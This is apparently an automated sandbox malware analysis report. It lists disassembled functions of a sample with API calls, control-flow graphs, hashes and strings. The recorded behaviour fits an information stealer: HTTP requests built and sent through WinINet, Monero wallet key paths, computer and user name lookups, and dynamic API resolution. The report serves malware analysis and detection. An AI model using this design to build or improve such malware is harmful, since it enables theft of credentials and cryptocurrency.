                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: d24d9dea38025bd7b1873b7ac6dda70bf704a27004f45f7d68400a0f94151dd3
                          • Instruction ID: d668cbe4d6a0208e0ebc91339732becdd559321a65aa26f6a4398890839499b5
                          • Opcode Fuzzy Hash: d24d9dea38025bd7b1873b7ac6dda70bf704a27004f45f7d68400a0f94151dd3
                          • Instruction Fuzzy Hash: 76A16DF55002419FD348EFABED88D7637F9E7C834170C853AA60DEB2A4D679A449CB12
                          Function 00CB45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 cb45c0-cb4695 RtlAllocateHeap 781 cb46a0-cb46a6 764->781 782 cb474f-cb47a9 VirtualProtect 781->782 783 cb46ac-cb474a 781->783 783->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CB460F
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00CB479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB4765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB4734
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB46C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB46B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB4729
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB46CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB45D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB4622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB4713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB45F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB4678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB45E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB4683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB4657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB4638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB4617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB4643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB45DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB46D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB45C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB46AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB4770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB4662
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: 1e8416cec426005843d92b5f64df3203126f94e07a6bd91b6f2e96da12e39c55
                          • Instruction ID: 166ff739335318efe0360bd189cd1763d9c0b7f70e5e0527b3bcbb2c644ce4d7
                          • Opcode Fuzzy Hash: 1e8416cec426005843d92b5f64df3203126f94e07a6bd91b6f2e96da12e39c55
                          • Instruction Fuzzy Hash: 9041BD607CA704EBA67AB7AC9CCEB9D77565F87701FD07866AE44923C0CEB069004627
                          Function 00CB4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 cb4880-cb4942 call cca7a0 call cb47b0 call cca740 * 5 InternetOpenA StrCmpCA 816 cb494b-cb494f 801->816 817 cb4944 801->817 818 cb4ecb-cb4ef3 InternetCloseHandle call ccaad0 call cb9ac0 816->818 819 cb4955-cb4acd call cc8b60 call cca920 call cca8a0 call cca800 * 2 call cca9b0 call cca8a0 call cca800 call cca9b0 call cca8a0 call cca800 call cca920 call cca8a0 call cca800 call cca9b0 call cca8a0 call cca800 call cca9b0 call cca8a0 call cca800 call cca9b0 call cca920 call cca8a0 call cca800 * 2 InternetConnectA 816->819 817->816 829 cb4f32-cb4fa2 call cc8990 * 2 call cca7a0 call cca800 * 8 818->829 830 cb4ef5-cb4f2d call cca820 call cca9b0 call cca8a0 call cca800 818->830 819->818 905 cb4ad3-cb4ad7 819->905 830->829 906 cb4ad9-cb4ae3 905->906 907 cb4ae5 905->907 908 cb4aef-cb4b22 HttpOpenRequestA 906->908 907->908 909 cb4b28-cb4e28 call cca9b0 call cca8a0 call cca800 call cca920 call cca8a0 call cca800 call cca9b0 call cca8a0 call cca800 call cca9b0 call cca8a0 call cca800 call cca9b0 call cca8a0 call cca800 call cca9b0 call cca8a0 call cca800 call cca920 call cca8a0 call cca800 call cca9b0 call cca8a0 call cca800 call cca9b0 call cca8a0 call cca800 call cca920 call cca8a0 call cca800 call cca9b0 call cca8a0 call cca800 call cca9b0 call cca8a0 call cca800 call cca9b0 call cca8a0 call cca800 call cca9b0 call cca8a0 call cca800 call cca920 call cca8a0 call cca800 call cca740 call cca920 * 2 call cca8a0 call cca800 * 2 call ccaad0 lstrlen call ccaad0 * 2 lstrlen call ccaad0 HttpSendRequestA 908->909 910 cb4ebe-cb4ec5 InternetCloseHandle 908->910 1021 cb4e32-cb4e5c InternetReadFile 909->1021 910->818 1022 cb4e5e-cb4e65 1021->1022 1023 cb4e67-cb4eb9 InternetCloseHandle call cca800 1021->1023 1022->1023 1024 cb4e69-cb4ea7 call cca9b0 call cca8a0 call cca800 1022->1024 1023->910 1024->1021
                          APIs
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CB4839
                            • Part of subcall function 00CB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CB4849
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00CB4915
                          • StrCmpCA.SHLWAPI(?,0189E6F8), ref: 00CB493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CB4ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00CD0DDB,00000000,?,?,00000000,?,",00000000,?,0189E748), ref: 00CB4DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00CB4E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00CB4E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00CB4E49
                          • InternetCloseHandle.WININET(00000000), ref: 00CB4EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00CB4EC5
                          • HttpOpenRequestA.WININET(00000000,0189E668,?,0189DEC8,00000000,00000000,00400100,00000000), ref: 00CB4B15
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                          • InternetCloseHandle.WININET(00000000), ref: 00CB4ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: 5a4d35278add8402a864906efe28a8f33891583995a83e92d945afdcafab7ff3
                          • Instruction ID: 064c677ab7b29d8e1c5a8f615260acce56963d1c18873f752613d3b9fed8f54a
                          • Opcode Fuzzy Hash: 5a4d35278add8402a864906efe28a8f33891583995a83e92d945afdcafab7ff3
                          • Instruction Fuzzy Hash: DF12C77191021CABDB15EB90DC9AFEEB378AF54304F5041ADF10666091EF702F8ADB66
                          Function 00CC78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CC7910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC7917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 00CC792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: edabedfb595271058d6fbec073ad4812d6ff9f71abc00a6b85f4e1746c312853
                          • Instruction ID: 8a7f1d90f612437ad61073a05029a855f81dd8bb67b1ee1230a12a74b6df73d9
                          • Opcode Fuzzy Hash: edabedfb595271058d6fbec073ad4812d6ff9f71abc00a6b85f4e1746c312853
                          • Instruction Fuzzy Hash: 130162B1904244EFC704DF99DD49FAABBB8F744B61F10426AE649A7280C37459048BA2
                          Function 00CC7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CB11B7), ref: 00CC7880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC7887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CC789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 7b61b993aec84deb7edc64fb9848e7596e72807f94ebbdd38f4ff94bd798be35
                          • Instruction ID: 45ceba009475e3cac95737ce5d2e1788a373041d86c8954b2c0f17176e40918e
                          • Opcode Fuzzy Hash: 7b61b993aec84deb7edc64fb9848e7596e72807f94ebbdd38f4ff94bd798be35
                          • Instruction Fuzzy Hash: 38F04FF1D44248AFC704DF99DD49FAEBBB8FB44761F10026AFA09A3680C7B41904CBA1
                          Function 00CB1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 76e0d2f270ad53339f80ca73adf97992c94aaa514e030ed4986ab0ac3d90a3ff
                          • Instruction ID: 0568bc06888186d303eef67a13ea92dba0cf201a900fc9330f2b04917a94b522
                          • Opcode Fuzzy Hash: 76e0d2f270ad53339f80ca73adf97992c94aaa514e030ed4986ab0ac3d90a3ff
                          • Instruction Fuzzy Hash: 77D05EB490030CDFCB00EFE1D849AEDBB78FB48312F440565DD0972380EA306486CAA6
                          Function 00CC9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 cc9c10-cc9c1a 634 cca036-cca0ca LoadLibraryA * 8 633->634 635 cc9c20-cca031 GetProcAddress * 43 633->635 636 cca0cc-cca141 GetProcAddress * 5 634->636 637 cca146-cca14d 634->637 635->634 636->637 638 cca216-cca21d 637->638 639 cca153-cca211 GetProcAddress * 8 637->639 640 cca21f-cca293 GetProcAddress * 5 638->640 641 cca298-cca29f 638->641 639->638 640->641 642 cca2a5-cca332 GetProcAddress * 6 641->642 643 cca337-cca33e 641->643 642->643 644 cca41f-cca426 643->644 645 cca344-cca41a GetProcAddress * 9 643->645 646 cca428-cca49d GetProcAddress * 5 644->646 647 cca4a2-cca4a9 644->647 645->644 646->647 648 cca4dc-cca4e3 647->648 649 cca4ab-cca4d7 GetProcAddress * 2 647->649 650 cca515-cca51c 648->650 651 cca4e5-cca510 GetProcAddress * 2 648->651 649->648 652 cca612-cca619 650->652 653 cca522-cca60d GetProcAddress * 10 650->653 651->650 654 cca67d-cca684 652->654 655 cca61b-cca678 GetProcAddress * 4 652->655 653->652 656 cca69e-cca6a5 654->656 657 cca686-cca699 GetProcAddress 654->657 655->654 658 cca708-cca709 656->658 659 cca6a7-cca703 GetProcAddress * 4 656->659 657->656 659->658
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,01885530), ref: 00CC9C2D
                          • GetProcAddress.KERNEL32(74DD0000,01885550), ref: 00CC9C45
                          • GetProcAddress.KERNEL32(74DD0000,0189A128), ref: 00CC9C5E
                          • GetProcAddress.KERNEL32(74DD0000,0189A0E0), ref: 00CC9C76
                          • GetProcAddress.KERNEL32(74DD0000,0189A140), ref: 00CC9C8E
                          • GetProcAddress.KERNEL32(74DD0000,0189A158), ref: 00CC9CA7
                          • GetProcAddress.KERNEL32(74DD0000,0188B770), ref: 00CC9CBF
                          • GetProcAddress.KERNEL32(74DD0000,0189D0C8), ref: 00CC9CD7
                          • GetProcAddress.KERNEL32(74DD0000,0189D1E8), ref: 00CC9CF0
                          • GetProcAddress.KERNEL32(74DD0000,0189D230), ref: 00CC9D08
                          • GetProcAddress.KERNEL32(74DD0000,0189D0E0), ref: 00CC9D20
                          • GetProcAddress.KERNEL32(74DD0000,01885350), ref: 00CC9D39
                          • GetProcAddress.KERNEL32(74DD0000,01885570), ref: 00CC9D51
                          • GetProcAddress.KERNEL32(74DD0000,01885590), ref: 00CC9D69
                          • GetProcAddress.KERNEL32(74DD0000,018855F0), ref: 00CC9D82
                          • GetProcAddress.KERNEL32(74DD0000,0189D200), ref: 00CC9D9A
                          • GetProcAddress.KERNEL32(74DD0000,0189D1D0), ref: 00CC9DB2
                          • GetProcAddress.KERNEL32(74DD0000,0188B4F0), ref: 00CC9DCB
                          • GetProcAddress.KERNEL32(74DD0000,01885370), ref: 00CC9DE3
                          • GetProcAddress.KERNEL32(74DD0000,0189D008), ref: 00CC9DFB
                          • GetProcAddress.KERNEL32(74DD0000,0189D248), ref: 00CC9E14
                          • GetProcAddress.KERNEL32(74DD0000,0189D260), ref: 00CC9E2C
                          • GetProcAddress.KERNEL32(74DD0000,0189D020), ref: 00CC9E44
                          • GetProcAddress.KERNEL32(74DD0000,01885670), ref: 00CC9E5D
                          • GetProcAddress.KERNEL32(74DD0000,0189D2A8), ref: 00CC9E75
